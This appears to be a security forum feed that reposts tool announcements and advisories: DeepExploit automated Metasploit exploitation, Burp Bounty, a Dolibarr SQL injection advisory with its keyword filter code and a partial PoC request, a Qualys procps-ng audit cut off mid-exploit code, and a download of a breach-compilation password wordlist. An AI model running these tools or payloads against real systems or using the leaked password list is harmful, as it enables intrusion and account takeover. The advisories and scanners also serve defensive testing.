    The team also proposed some defenses that can be used to detect or prevent such type of attacks, including a new feedback controller that could be deployed as a firmware update to attenuate the intentional acoustic interference, a sensor fusion method to prevent unnecessary head parking by detecting ultrasonic triggering of the shock sensor, and noise dampening materials to attenuate the signal.

    You can find out more about HDD ultrasonic acoustic attacks in a research paper [PDF] titled "Blue Note: How Intentional Acoustic Interference Damages Availability and Integrity in Hard Disk Drives and Operating Systems."


    Via thehackernews.com

    • Upvote 1
  11. Burp Bounty is a extension of Burp Suite that improve an active and passive scanner by yourself. This extension requires Burp Suite Pro.


    Burp Bounty v1.0

    This extension allows you, in a quick and simple way, to improve the active and passive burpsuite scanner by means of personalized rules through a very intuitive graphical interface. Through an advanced search of patterns and an improvement of the payload to send, we can create our own issue profiles both in the active scanner and in the passive.





    1. Config section

    • Profile Manager: you can manage the profiles, enable, disable o remove any of them.
    • Select Profile: you can choose any profile, for modify it and save.
    • Profiles reload: you can reload the profiles directory, for example, when you add new external profile to directory.
    • Profile Directory: you choose the profiles directory path.




    2. Payloads

    • You can add many payloads as you want.

    • Each payload of this secction will be sent at each entry point (Insertion points provided by the burp api)

    • You can choos multiple Enocders. For example, if you want encode the string alert(1), many times (in descendent order):

      1. Plain text: alert(1)

      2. HTML-encode all characters: &#x61;&#x6c;&#x65;&#x72;&#x74;&#x28;&#x31;&#x29;

      3. URL-encode all characters: %26%23%78%36%31%3b%26%23%78%36%63%3b%26%23%78%36%35%3b%26%23%78%37%32%3b%26%23%78%37%34%3b%26%23%78%32%38%3b%26%23%78%33%31%3b%26%23%78%32%39%3b


    • If you choose "URL-Encode these characters" option, you can put all characters that you want encode with URL.



    3. Grep - Math

    • For each payload response, each string, regex or payload (depending of you choose) will be searched with the specific Grep Options.

    • Grep Type:

      • Simple String: search for a simple string or strings
      • Regex: search for regular expression
      • Payload: search for payloads sended
      • Payload without encode: if you encode the payload, and you want find for original payload, you should choose this
    • Grep Options:

      • Negative match: if you want find if string, regex or payload is not present in response
      • Case sensitive: Only match if case sensitive
      • Not in cookie: if you want find if any cookie attribute is not present
      • Content type: you can specify one or multiple (separated by comma) content type to search the string, regex or payload. For example: text/plain, text/html, ...
      • Response Code: you can specify one or multiple (separated by coma) HTTP response code to find string, regex or payload. For example. 300, 302, 400, ...


    4. Write an Issue

    • In this section you can specify the issue that will be show if the condition match with the options specified.
    • Issue Name
    • Severity
    • Confidence
    • And others details like description, background, etc.




    So, the vulnerabilities identified so far, from which you can make personalized improvements are:


    1. Active scan

    • XSS reflected and Stored
    • SQL Injection error based
    • XXE
    • Command injection
    • Open Redirect
    • Local File Inclusion
    • Remote File Inclusion
    • Path Traversal
    • LDAP Injection
    • ORM Injection
    • XML Injection
    • SSI Injection
    • XPath Injection
    • etc


    2. Passive scan

    • Security Headers
    • Cookies attributes
    • Software versions
    • Error strings
    • In general any string or regular expression.







    Improvements for version 2.0:

    • Add the burpcollaborator, to find blind vulnerabilities
    • Follow redirects and how many to follow
    • Processing cookies in redirect
    • Regular expression in content type
    • Response codes to avoid
    • Content type to avoid
    • Search only in HTTP Headers
    • Exclude HTTP headers from the search
    • Add option to insert new headers in the requests.


    Download: BurpBounty-master.zip




    • Upvote 1
  12. Deep Exploit at Black Hat USA 2018 Arsenal.



    DeepExploit is fully automated penetration tool linked with Metasploit.
    It has two exploitation modes.

    • Intelligence mode
      DeepExploit identifies the status of all opened ports on the target server and executes the exploit at pinpoint using Machine Learning.
    • Brute force mode
      DeepExploit executes exploits thoroughly using all combinations of "Exploit module", "Target" and "Payload" of Metasploit corresponding to user's indicated product name and port number.

    DeepExploit's key features are following.  

    • Self-learning.
      DeepExploit can learn how to exploitation by itself (uses reinforcement learning).
      It is not necessary for humans to prepare learning data.  
    • Efficiently execute exploit.
      DeepExploit can execute exploits at pinpoint (minimum 1 attempt) using self-learned data.
    • Deep penetration.
      If DeepExploit succeeds the exploit to the target server, it further executes the exploit to other internal servers.  
    • Operation is very easy.
      Your only operation is to input one command.
      It is very easy!!
    • Learning time is very fast.
      Generally, learning takes a lot of time.
      So, DeepExploit uses distributed learning by multi agents.
      We adopted an advanced machine learning model called A3C.


    Abilities of "Deep Exploit"

    Current DeepExploit's version is a beta.
    But, it can fully automatically execute following actions:

    • Intelligence gathering.
    • Threat modeling.
    • Vulnerability analysis.
    • Exploitation.
    • Post-Exploitation.
    • Reporting.


    Your benefits

    By using our DeepExploit, you will benefit from the following.

    For pentester:
    (a) They can greatly improve the test efficiency.
    (b) The more pentester uses DeepExploit, DeepExploit learns how to method of exploitation using machine learning. As a result, accuracy of test can be improve.

    For Information Security Officer:
    (c) They can quickly identify vulnerabilities of own servers. As a result, prevent that attackers attack to your servers using vulnerabilities, and protect your reputation by avoiding the negative media coverage after breach.

    Since attack methods to servers are evolving day by day, there is no guarantee that yesterday's security countermeasures are safety today. It is necessary to quickly find vulnerabilities and take countermeasures. Our DeepExploit will contribute greatly to keep your safety.



    Note: If you are interested, please use them in an environment under your control and at your own risk.


    System component



    DeepExploit consists of the machine learning model (A3C) and Metasploit.
    The A3C executes exploit to the target servers via RPC API.

    The A3C is developped by Keras and Tensorflow that famous ML framework based on Python. It is used to self-learn exploit's way using deep reinforcement learning. The self-learned's result is stored to learned data that reusable.

    Metasploit is most famous penetration test tool in the world. It is used to execute an exploit to the target servers based on instructions from the A3C.


    Processing flow

    Intelligence mode



    Step 1. Port scan the training servers.

    DeepExploit gathers information such as OS, opened port number, product name, protocol on the target server.
    So, it executes the port scanning to training servers.
    After port scanning, it executes two Metasploit's command (hosts and services) via RPC API.

    • ex) The result of hosts command.
    address          mac                name  os_name  os_flavor  os_sp  purpose  info  comments
    -------          ---                ----  -------  ---------  -----  -------  ----  --------  00:0c:29:16:3a:ce        Linux               2.6.X  server

    DeepExploit gets OS type using regular expression from result of hosts command.
    In above example, DeepExploit gets OS type as Linux.

    • ex) The result of services command.
    host             port  proto  info
    ----             ----  -----  ----  21    tcp    vsftpd 2.3.4  22    tcp    OpenSSH 4.7p1 Debian 8ubuntu1 protocol 2.0  23    tcp    Linux telnetd  25    tcp    Postfix smtpd  53    tcp    ISC BIND 9.4.2
    ...snip...  5900  tcp    VNC protocol 3.3  6000  tcp    access denied  6667  tcp    UnrealIRCd  8009  tcp    Apache Jserv Protocol v1.3  8180  tcp    Apache Tomcat/Coyote JSP engine 1.1
    RHOSTS =>

    DeepExploit gets other information such as opened port numbers, protocol types, product name, product version using regular expression from result of service command.

    In above example, DeepExploit gets following information from the target server.


    Idx OS Port# Protocol product version
    1 Linux 21 tcp vsftpd 2.3.4
    2 Linux 22 tcp ssh 4.7p1
    3 Linux 23 tcp telnet -
    4 Linux 25 tcp postfix -
    5 Linux 53 tcp bind 9.4.2
    6 Linux 5900 tcp vnc 3.3
    7 Linux 6667 tcp irc -
    8 Linux 8180 tcp tomcat -


    Step 2. Training.



    DeepExploit learns how to method of exploitation using advanced machine learning model called A3C.

    The A3C consists of multiple neural networks.
    The neural networks takes the information of the training server gathered in Step1 as input and outputs some kinds of Payload. And the A3C uses the output Payload to Exploit to the training server via Metasploit. In accordance with the result (success / failure) of Exploit, the A3C updates the weight of the neural network (parameter related to attack accuracy). By performing the above processing (learning) with a combination of various inputs, an optimum Payload for input information is gradually output.
    In order to shorten the learning time, we execute this processing in multi threads.

    Therefore, learning by using various training servers, DeepExploit can execute accurate exploit according to various situations.
    So, DeepExploit uses training servers such as metasploitable3, metasploitable2, owaspbwa for learning.


    Step 3. Testing.

    DeepExploit execute exploit to the testing server using learned result in Step2.
    It can execute exploits at pinpoint (minimum 1 attempt).


    Step 4. Post exploit.

    If DeepExploit succeeds in Exploit of the testing server, it executes exploit to the internal servers with the testing server as a springboard.


    Step 5. Generate report.

    DeepExploit generates a report that summarizes vulnerabilities.
    Report's style is html.


    Brute force mode



    Step 1. Getting target products.

    DeepExploit receives a target product name list from the user via the console.
    Each product names are separated by "@" mark.

    • ex) Target product name list.

    Note: The specified product name must be a name that can be recognized by the Metasploit search command.


    Step 2. Exploit.

    DeepExploit takes Exploit modules, Targets, Payloads of Metasploit corresponding to the specified products and executes exploit thoroughly using all combinations of them.


    Step 3. Post exploit.

    If DeepExploit succeeds in Exploit of the testing server, it executes exploit to the internal servers with the testing server as a springboard.


    Step 4. Generate report.

    DeepExploit generates a report that summarizes vulnerabilities.
    Report's style is html.



    Step.0 Git clone DeepExploit's repository.

    local@client:~$ git clone https://github.com/13o-bbr-bbq/machine_learning_security.git


    Step.1 Install required packages.

    local@client:~$ cd machine_learning_security/DeepExploit
    local@client:~$ python install -r requirements.txt


    Step.2 Change the setting of Keras.

    Keras is library of machine learning linked with Tensorflow.
    So, you need to edit Keras config file "keras.json" before run Deep Exploit.

    local@client:~$ cd "your home directory"/.keras
    local@client:~$ vim keras.json
        "epsilon": 1e-07, 
        "floatx": "float32", 
        "image_data_format": "channels_last", 
        "backend": "tensorflow"

    You rewrite the element of "backend" to "tensorflow".
    Installation is over.



    Step.0 Initialize Metasploit DB


    Firstly, you initialize metasploit db (postgreSQL) using msfdb command.

    root@kali:~# msfdb init


    Step.1 Launch Metasploit Framework

    You launch Metasploit on the remote server that installed Metasploit Framework such as Kali Linux.

    root@kali:~# msfconsole
    |                                                                              |
    |                   METASPLOIT CYBER MISSILE COMMAND V4                        |
         \\                                  /                      /
          \\     .                          /                      /            x
           \\                              /                      /
            \\                            /          +           /
             \\            +             /                      /
              *                        /                      /
                                      /      .               /
       X                             /                      /            X
                                    /                     ###
                                   /                     # % #
                                  /                       ###
                         .       /
        .                       /      .            *           .
                     +                       *
    ####      __     __     __          #######         __     __     __        ####
    ####    /    \\ /    \\ /    \\      ###########     /    \\ /    \\ /    \\      ####
    # WAVE 4 ######## SCORE 31337 ################################## HIGH FFFFFFFF #
          =[ metasploit v4.16.15-dev                         ]
    + -- --=[ 1699 exploits - 968 auxiliary - 299 post        ]
    + -- --=[ 503 payloads - 40 encoders - 10 nops            ]
    + -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]
    msf >


    Step.2 Launch RPC Server

    You launch RPC Server of Metasploit following.

    msf> load msgrpc ServerHost= ServerPort=55553 User=test Pass=test1234
    [*] MSGRPC Service:
    [*] MSGRPC Username: test
    [*] MSGRPC Password: test1234
    [*] Successfully loaded plugin: msgrpc
    msgrpc options            description
    ServerHost IP address of your server that launched Metasploit. Above example is
    ServerPort Any port number of your server that launched Metasploit. Above example is 55553.
    User Any user name using authentication (default => msf). Above example is test.
    Pass Any password using authentication (default => random string). Above example is test1234.



    Step.3 Edit config file.

    You have to change following value in config.ini

    server_host :
    server_port : 55553
    msgrpc_user : test
    msgrpc_pass : test1234
    lhost       :
    config                       description
    server_host IP address of your server that launched Metasploit. Your setting value ServerHost in Step2.
    server_port Any port number of your server that launched Metasploit. Your setting value ServerPort in Step2.
    msgrpc_user Metasploit's user name using authentication. Your setting value User in Step2.
    msgrpc_pass Metasploit's password using authentication. Your setting value Pass in Step2.
    lhost IP address of your server that launched Metasploit. Your setting value ServerHost in Step2.



    Intelligence mode


    Step.4 Train Deep Exploit

    You execute Deep Exploit with training mode on the client machine.

    local@client:~$ python DeepExploit.py -t -m train
    command options         description
    -t, --target IP address of training vulnerable host such as Metasploitable2.
    -m, --mode Execution mode "train".


    • Demo) learning with 10 threads.


    Step.5 Test using trained Deep Exploit

    You execute Deep Exploit with testing mode on the client machine.

    local@client:~$ python DeepExploit.py -t -m test
    command options         description
    -t, --target IP address of test target host.
    -m, --mode Execution mode "test".


    • Demo) testing with 1 thread.


    Step.6 Check scan report.

    Please check scan report using any web browser.

    local@client:~$ firefox "Deep Exploit root path"/report/DeepExploit_report.html


    Brute force mode


    Step.4 Brute force Deep Exploit

    You execute DeepExploit with brute force mode on the client machine.

    local@client:~$ python DeepExploit.py -t -p 80 -s wordpress@joomla@drupal@tikiwiki
    command options          description
    -t, --target IP address of test target host.
    -p, --port Indicate port number of target server.
    -s, --service Indicate product name of target server.


    • Demo) Brute force mode.

    Coming soon!!


    Step.5 Check scan report

    Please check scan report using any web browser.



    1. How to change "Exploit module's option".

    When Deep Exploit exploits, it uses default value of Exploit module options.
    If you want to change option values, please input any value to "user_specify" in exploit_tree.json as following.

    "unix/webapp/joomla_media_upload_exec": {
        "targets": {
            "0": [
            "TARGETURI": {
                "type": "string",
                "required": true,
                "advanced": false,
                "evasion": false,
                "desc": "The base path to Joomla",
                "default": "/joomla",
                "user_specify": "/my_original_dir/"

    Above example is to change value of TARGETURI option in exploit module "exploit/unix/webapp/joomla_media_upload_exec" to "/my_original_dir/" from "/joomla".


    Operation check environment

    • Kali Linux 2017.3 (Guest OS on VMWare)
      • Memory: 8.0GB
      • Metasploit Framework 4.16.15-dev
    • Windows 10 Home 64-bit (Host OS)
      • CPU: Intel(R) Core(TM) i7-6500U 2.50GHz
      • Memory: 16.0GB
      • Python 3.6.1(Anaconda3)
      • tensorflow 1.4.0
      • Keras 2.1.2
      • msgpack 0.4.8
      • docopt 0.6.2


    More information

    MBSD Blog
    Sorry, now Japanese only.
    English version is coming soon



    Apache License 2.0


    Contact us

    Isao Takaesu




    • Upvote 3
  13. logo.png



    Credits: 1N3@CrowdShield

    Website: https://crowdshield.com

    Version: 1.1



    Quickly analyze and reverse engineer Android applications.



    • Displays all extracted files for easy reference
    • Automatically decompile APK files to Java and Smali format
    • Analyze AndroidManifest.xml for common vulnerabilities and behavior
    • Static source code analysis for common vulnerabilities and behavior
      • Device info
      • Intents
      • Command execution
      • SQLite references
      • Logging references
      • Content providers
      • Broadcast recievers
      • Service references
      • File references
      • Crypto references
      • Hardcoded secrets
      • URL's
      • Network connections
      • SSL references
      • WebView references






    reverse-apk <apk_name>



    This software is free to distribute, modify and use with the condition that credit is provided to the creator (1N3@CrowdShield) and is not for commercial use.


    Download: ReverseAPK-master.zip

    git clone https://github.com/1N3/ReverseAPK.git


    • Upvote 1
  14. download-blach-1.png

    Author: Justin Seitz

    When it comes to hacking something, Python is there on the top of the list with hacking. Every hacker or penetration tester goes with python coding and scripts. Python is still very dominant language in the world of cyber security, even if the conversation about language of choice sometimes looks more like a war. Python programming based tools include all sort of fuzzers, proxies, and even the most dangerous exploits. Exploit frameworks like CANVAS are totally written in Python as more are obscure tools like PyEmu or Sulley. So, here’s a complete book about learning python used for hacking. Download black hat python pdf free of cost.



    Chapter 1: Setting Up Your Python Environment
    Chapter 2: The Network: Basics
    Chapter 3: The Network: Raw Sockets and Sniffing
    Chapter 4: Owning the Network with Scapy
    Chapter 5: Web Hackery
    Chapter 6: Extending Burp Proxy
    Chapter 7: GitHub Command and Control
    Chapter 8: Common Trojaning Tasks on Windows
    Chapter 9: Fun with Internet Explorer
    Chapter 10: Windows Privilege Escalation
    Chapter 11: Automating Offensive Forensics

    Download: Black-Hat-Python.pdf

    Password: EHT


    • Thanks 1
  15. wordlist created from original 41G stash via:
    grep -rohP '(?<=:).*$' | uniq > breachcompilation.txt
    Then, compressed with:
    7z a breachcompilation.txt.7z breachcompilation.txt
    4.1G compressed
    9.0G uncompressed
    No personal information included - just a list of passwords.
    magnet url:
    full base


    Mirror [944.4 MB, expands to 4.07 GB]


    Source: reddit.com

    • Upvote 2
  16. # [CVE-2018-10094] Dolibarr SQL Injection vulnerability
    ## Description
    Dolibarr is an "Open Source ERP & CRM for Business" used by many
    companies worldwide.
    It is available through [GitHub](https://github.com/Dolibarr/dolibarr)
    or as distribution packages (e.g .deb package).
    The application does not handle user input properly and allows execution
    of arbitrary SQL commands on the database.
    Prepared queries should be used in order to avoid SQL injection in user
    ## Vulnerability type
    **CVE ID**: CVE-2018-10094
    **Access Vector**: remote
    **Security Risk**: high
    **Vulnerability**: CWE-89
    **CVSS Base Score**: 7.5
    **CVSS Vector String**: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    ## Details
    The database connector escapes quotes with the `real_escape_string()`
    wrapper. However it is still possible to perform injection on integer
    parameters without quotes.
         *  Escape a string to insert data
         *  @param  string  $stringtoencode     String to escape
         *  @return string                      String escaped
        function escape($stringtoencode)
            return $this->db->real_escape_string($stringtoencode);
    Additional checks are defined later, which forbit some SQL keywords (e.g
    `union`, `create`, `insert`). However, by url encoding the payload,
    these checks are bypassed.
     * Security: SQL Injection and XSS Injection (scripts) protection
    (Filters on GET, POST, PHP_SELF).
     * @param       string      $val        Value
     * @param       string      $type       1=GET, 0=POST, 2=PHP_SELF
     * @return      int                     >0 if there is an injection
    function test_sql_and_script_inject($val, $type)
        $inj = 0;
        // For SQL Injection (only GET are used to be included into bad
    escaped SQL requests)
        if ($type == 1)
            $inj += preg_match('/updatexml\(/i',     $val);
            $inj += preg_match('/delete\s+from/i',   $val);
            $inj += preg_match('/create\s+table/i',  $val);
            $inj += preg_match('/insert\s+into/i',   $val);
            $inj += preg_match('/select\s+from/i',   $val);
            $inj += preg_match('/into\s+(outfile|dumpfile)/i',  $val);
        if ($type != 2) // Not common, we can check on POST
            $inj += preg_match('/update.+set.+=/i',  $val);
            $inj += preg_match('/union.+select/i',   $val);
            $inj += preg_match('/(\.\.%2f)+/i',      $val);
        // For XSS Injection done by adding javascript with script
        // This is all cases a browser consider text is javascript:
        // When it found '<script', 'javascript:', '<style', 'onload\s=' on
    body tag, '="&' on a tag size with old browsers
        // All examples on page: http://ha.ckers.org/xss.html#XSScalc
        // More on
        $inj += preg_match('/<script/i', $val);
        $inj += preg_match('/<iframe/i', $val);
        $inj += preg_match('/Set\.constructor/i', $val);    // ECMA script 6
        if (! defined('NOSTYLECHECK')) $inj += preg_match('/<style/i', $val);
        $inj += preg_match('/base[\s]+href/si', $val);
        $inj += preg_match('/<.*onmouse/si', $val);       // onmousexxx can
    be set on img or any html tag like <img title='...' onmouseover=alert(1)>
        $inj += preg_match('/onerror\s*=/i', $val);       // onerror can be
    set on img or any html tag like <img title='...' onerror = alert(1)>
        $inj += preg_match('/onfocus\s*=/i', $val);       // onfocus can be
    set on input text html tag like <input type='text' value='...' onfocus =
        $inj += preg_match('/onload\s*=/i', $val);        // onload can be
    set on svg tag <svg/onload=alert(1)> or other tag like body <body
        $inj += preg_match('/onclick\s*=/i', $val);       // onclick can be
    set on img text html tag like <img onclick = alert(1)>
        $inj += preg_match('/onscroll\s*=/i', $val);      // onscroll can be
    on textarea
        //$inj += preg_match('/on[A-Z][a-z]+\*=/', $val);   // To lock event
    handlers onAbort(), ...
        $inj += preg_match('/&#58;|&#0000058|&#x3A/i', $val);       //
    refused string ':' encoded (no reason to have it encoded) to lock
        //if ($type == 1)
            $inj += preg_match('/javascript:/i', $val);
            $inj += preg_match('/vbscript:/i', $val);
        // For XSS Injection done by adding javascript closing html tags
    like with onmousemove, etc... (closing a src or href tag with not
    cleaned param)
        if ($type == 1) $inj += preg_match('/"/i', $val);       // We
    refused " in GET parameters value
        if ($type == 2) $inj += preg_match('/[;"]/', $val);     // PHP_SELF
    is a file system path. It can contains spaces.
        return $inj;
    ## Proof of Concept : retrieving the database name.
    1) union select
    Url-encoded payload:
    Host: dolibarr.lab:2080
    User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Connection: close
    Upgrade-Insecure-Requests: 1
                 <td class="nowrap">
    ## Affected versions
    * Version 7.0.0 (last stable version as of March 2018) - previous
    versions are probably also vulnerable but not tested
    ## Solution
    Update to 7.0.2
    ## Timeline (dd/mm/yyyy)
    * 18/03/2018 : Initial discovery
    * 17/04/2018 : Contact with the editor
    * 17/04/2018 : Editor acknowledges the vulnerability
    * 18/04/2018 : Editor announces fixes in version 7.0.2
    * 21/05/2018 : Vulnerability disclosure
    ## Credits
    * Issam RABHI (i dot rabhi at sysdream dot com)
    * Kevin LOCATI (k dot locati at sysdream dot com)
    -- SYSDREAM Labs <labs@sysdream.com> GPG : 47D1 E124 C43E F992 2A2E 1551 8EB4 8CD9 D5B2 59A1 * Website: https://sysdream.com/ * Twitter: @sysdream

    Source: exploit-db.com

    • Thanks 1
  17. Prowler

    Prowler is a Network Vulnerability Scanner implemented on a Raspberry Pi Cluster, first developed during Singapore Infosec Community Hackathon - HackSmith v1.0.




    • Scan a network (a particular subnet or a list of IP addresses) for all IP addresses associated with active network devices
    • Determine the type of devices using fingerprinting
    • Determine if there are any open ports on the device
    • Associate the ports with common services
    • Test devices against a dictionary of factory default and common credentials
    • Notify users of security vulnerabilities through an dashboard. Dashboard tour


    Planned capabilities

    • Greater variety of vulnerability assessment capabilities (webapp etc.)
    • Select wordlist based on fingerprint



    • Raspberry Pi Cluster HAT (with 4 * Pi Zero W)
    • Raspberry Pi 3
    • Networking device


    Software Stack

    • Raspbian Stretch (Controller Pi)
    • Raspbian Stretch Lite (Worker Pi Zero)
    • Note: For ease of setup, use the images provided by Cluster Hat! Instructions
    • Python 3 (not tested on Python 2)
    • Python packages see requirements.txt
    • Ansible for managing the cluster as a whole (/playbooks)


    Key Python Package

    • dispy (website) is the star of the show. It allows allows us to create a job queue that will be processed by the worker nodes.
    • python-libnmap is the python wrapper around nmap, an open source network scanner. It allows us to scan for open ports on devices.
    • paramiko is a python wrapper around SSH. We use it to probe SSH on devices to test for common credentials.
    • eel is used for the web dashboard (seperate repository, here)
    • rabbitmq (website) is used to pass the results from the cluster to the eel server that is serving the dashboard page.


    Ansible Playbooks

    For the playbooks to work, ansible must be installed (sudo pip3 install ansible). Configure the IP addresses of the nodes at /etc/ansible/hosts. WARNING: Your mileage may vary as these were only tested on my setup

    • shutdown.yml and reboot.yml self-explanatory
    • clone_repos.yml clone prowler and dispy repositories (required!) on the worker nodes
    • setup_node.yml installs all required packages on the worker nodes. Does not clone the repositories!


    Deploying Prowler

    1. Clone the git repository: git clone https://github.com/tlkh/prowler.git
    2. Install dependencies by running sudo pip3 install -r requirements.txt on the controller Pi
    3. Run ansible-playbook playbooks/setup_node.yml to install the required packages on worker nodes.
    4. Clone the prowler and dispy repositories to the worker nodes using ansible-playbook playbooks/clone_repos.yml
    5. Run clusterhat on on the controller Pi to ensure that all Pi Zeros are powered up.
    6. Run python3 cluster.py on the controller Pi to start Prowler

    To edit the range of IP addresses being scanned, edit the following lines in cluster.py:

    test_range = []
        for i in range(0, 1):
            for j in range(100, 200):
                test_range.append("172.22." + str(i) + "." + str(j))

    Old Demos


    Useful Snippets

    • To run ssh command on multiple devices, install pssh and pssh -h pssh-hosts -l username -A -i "command"
    • To create the cluster (in compute.py): cluster = dispy.JobCluster(compute, nodes='pi0_ip', ip_addr='pi3_ip')
    • Check connectivity: ansible all -m ping or ping p1.local -c 1 && ping p2.local -c 1 && ping p3.local -c 1 && ping p4.local -c 1
    • Temperature Check: /opt/vc/bin/vcgencmd measure_temp && pssh -h workers -l pi -A -i "/opt/vc/bin/vcgencmd measure_temp" | grep temp
    • rpimonitor (how to install):




    • Faith See
    • Wong Chi Seng
    • Timothy Liu

    ABSOLUTELY NO WARRANTY WHATSOEVER! Feel free to submit issues though.



    Download: prowler-master.zip





    • Thanks 1
    • Upvote 1
  18. ShellCheck is a GPLv3 tool that gives warnings and suggestions for bash/sh shell scripts:


    The goals of ShellCheck are

    • To point out and clarify typical beginner's syntax issues that cause a shell to give cryptic error messages.

    • To point out and clarify typical intermediate level semantic problems that cause a shell to behave strangely and counter-intuitively.

    • To point out subtle caveats, corner cases and pitfalls that may cause an advanced user's otherwise working script to fail under future circumstances.

    See the gallery of bad code for examples of what ShellCheck can help you identify!





    How to use

    There are a number of ways to use ShellCheck!


    On the web

    Paste a shell script on https://www.shellcheck.net for instant feedback.

    ShellCheck.net is always synchronized to the latest git commit, and is the easiest way to give ShellCheck a go. Tell your friends!


    From your terminal

    Run shellcheck yourscript in your terminal for instant output, as seen above.


    In your editor

    You can see ShellCheck suggestions directly in a variety of editors.







    Download: shellcheck-master.zip

    git clone https://github.com/koalaman/shellcheck.git


  19. Web-based multi-AV scanners, and malware sandboxes for automated analysis.


    • anlyz.io - Online sandbox.
    • any.run - Online interactive sandbox.
    • AndroTotal - Free online analysis of APKs against multiple mobile antivirus apps.
    • AVCaesar - Malware.lu online scanner and malware repository.
    • Cryptam - Analyze suspicious office documents.
    • Cuckoo Sandbox - Open source, self hosted sandbox and automated analysis system.
    • cuckoo-modified - Modified version of Cuckoo Sandbox released under the GPL. Not merged upstream due to legal concerns by the author.
    • cuckoo-modified-api - A Python API used to control a cuckoo-modified sandbox.
    • DeepViz - Multi-format file analyzer with machine-learning classification.
    • detux - A sandbox developed to do traffic analysis of Linux malwares and capturing IOCs.
    • DRAKVUF - Dynamic malware analysis system.
    • firmware.re - Unpacks, scans and analyzes almost any firmware package.
    • HaboMalHunter - An Automated Malware Analysis Tool for Linux ELF Files.
    • Hybrid Analysis - Online malware analysis tool, powered by VxSandbox.
    • Intezer - Detect, analyze, and categorize malware by identifying code reuse and code similarities.
    • IRMA - An asynchronous and customizable analysis platform for suspicious files.
    • Joe Sandbox - Deep malware analysis with Joe Sandbox.
    • Jotti - Free online multi-AV scanner.
    • Limon - Sandbox for Analyzing Linux Malware.
    • Malheur - Automatic sandboxed analysis of malware behavior.
    • malsub - A Python RESTful API framework for online malware and URL analysis services.
    • Malware config - Extract, decode and display online the configuration settings from common malwares.
    • Malwr - Free analysis with an online Cuckoo Sandbox instance.
    • Metadefender - Scan a file, hash or IP address for malware (free).
    • NetworkTotal - A service that analyzes pcap files and facilitates the quick detection of viruses, worms, trojans, and all kinds of malware using Suricata configured with EmergingThreats Pro.
    • Noriben - Uses Sysinternals Procmon to collect information about malware in a sandboxed environment.
    • PacketTotal - PacketTotal is an online engine for analyzing .pcap files, and visualizing the network traffic within.
    • PDF Examiner - Analyse suspicious PDF files.
    • ProcDot - A graphical malware analysis tool kit.
    • Recomposer - A helper script for safely uploading binaries to sandbox sites.
    • sandboxapi - Python library for building integrations with several open source and commercial malware sandboxes.
    • SEE - Sandboxed Execution Environment (SEE) is a framework for building test automation in secured Environments.
    • SEKOIA Dropper Analysis - Online dropper analysis (Js, VBScript, Microsoft Office, PDF).
    • VirusTotal - Free online analysis of malware samples and URLs
    • Visualize_Logs - Open source visualization library and command line tools for logs. (Cuckoo, Procmon, more to come...)
    • Zeltser's List - Free automated sandboxes and services, compiled by Lenny Zeltser.
    • Upvote 1
  20. Author: Qualys Corporation



    Procps-ng Audit Report
    1. FUSE-backed /proc/PID/cmdline
    2. Unprivileged process hiding
    3. Local Privilege Escalation in top (Low Impact)
    4. Denial of Service in ps
    5. Local Privilege Escalation in libprocps (High Impact)
       5.1. Vulnerability
       5.2. Exploitation
       5.3. Exploitation details
       5.4. Non-PIE exploitation
       5.5. PIE exploitation
    We performed a complete audit of procps-ng, the "command line and full
    screen utilities for browsing procfs, a 'pseudo' file system dynamically
    generated by the [Linux] kernel to provide information about the status
    of entries in its process table" (https://gitlab.com/procps-ng/procps).
    procps-ng contains the utilities free, kill, pgrep, pidof, pkill, pmap,
    ps, pwdx, skill, slabtop, snice, sysctl, tload, top, uptime, vmstat, w,
    watch, and the necessary libprocps library.
    We discovered and submitted patches for more than a hundred bugs and
    vulnerabilities in procps-ng; for reference, our patches are available
    and base64-encoded at the end of this advisory. In the remainder of this
    advisory, we present our most interesting findings:
    1. FUSE-backed /proc/PID/cmdline (CVE-2018-1120)
      An attacker can block any read() access to /proc/PID/cmdline by
      mmap()ing a FUSE file (Filesystem in Userspace) onto this process's
      command-line arguments. The attacker can therefore block pgrep, pidof,
      pkill, ps, and w, either forever (a denial of service), or for some
      controlled time (a synchronization tool for exploiting other
    2. Unprivileged process hiding (CVE-2018-1121)
      An unprivileged attacker can hide a process from procps-ng's
      utilities, by exploiting either a denial of service (a rather noisy
      method) or a race condition inherent in reading /proc/PID entries (a
      stealthier method).
    3. Local Privilege Escalation in top (CVE-2018-1122)
      top reads its configuration file from the current working directory,
      without any security check, if the HOME environment variable is unset
      or empty. In this very unlikely scenario, an attacker can carry out an
      LPE (Local Privilege Escalation) if an administrator executes top in
      /tmp (for example), by exploiting one of several vulnerabilities in
      top's config_file() function.
    4. Denial of Service in ps (CVE-2018-1123)
      An attacker can overflow the output buffer of ps, when executed by
      another user, administrator, or script: a denial of service only (not
      an LPE), because ps mmap()s its output buffer and mprotect()s its last
      page with PROT_NONE (an effective guard page).
    5. Local Privilege Escalation in libprocps (CVE-2018-1124)
      An attacker can exploit an integer overflow in libprocps's
      file2strvec() function and carry out an LPE when another user,
      administrator, or script executes a vulnerable utility (pgrep, pidof,
      pkill, and w are vulnerable by default; other utilities are vulnerable
      if executed with non-default options). Moreover, an attacker's process
      running inside a container can trigger this vulnerability in a utility
      running outside the container: the attacker can exploit this userland
      vulnerability and break out of the container or chroot. We will
      publish our proof-of-concept exploits in the near future.
    Additionally, CVE-2018-1125 has been assigned to
    0008-pgrep-Prevent-a-potential-stack-based-buffer-overflo.patch, and
    CVE-2018-1126 to 0035-proc-alloc.-Use-size_t-not-unsigned-int.patch.
    1. FUSE-backed /proc/PID/cmdline (CVE-2018-1120)
    In this experiment, we add a sleep(60) to hello_read() in
    https://github.com/libfuse/libfuse/blob/master/example/hello.c and
    compile it, mount it on /tmp/fuse, and mmap() /tmp/fuse/hello onto the
    command-line arguments of a simple proof-of-concept:
    $ gcc -Wall hello.c `pkg-config fuse --cflags --libs` -o hello
    $ mkdir /tmp/fuse
    $ ./hello /tmp/fuse
    $ cat > fuse-backed-cmdline.c << "EOF"
    #include <fcntl.h>
    #include <stdio.h>
    #include <stdlib.h>
    #include <string.h>
    #include <sys/mman.h>
    #include <sys/stat.h>
    #include <sys/types.h>
    #include <unistd.h>
    #define die() do { \
        fprintf(stderr, "died in %s: %u\n", __func__, __LINE__); \
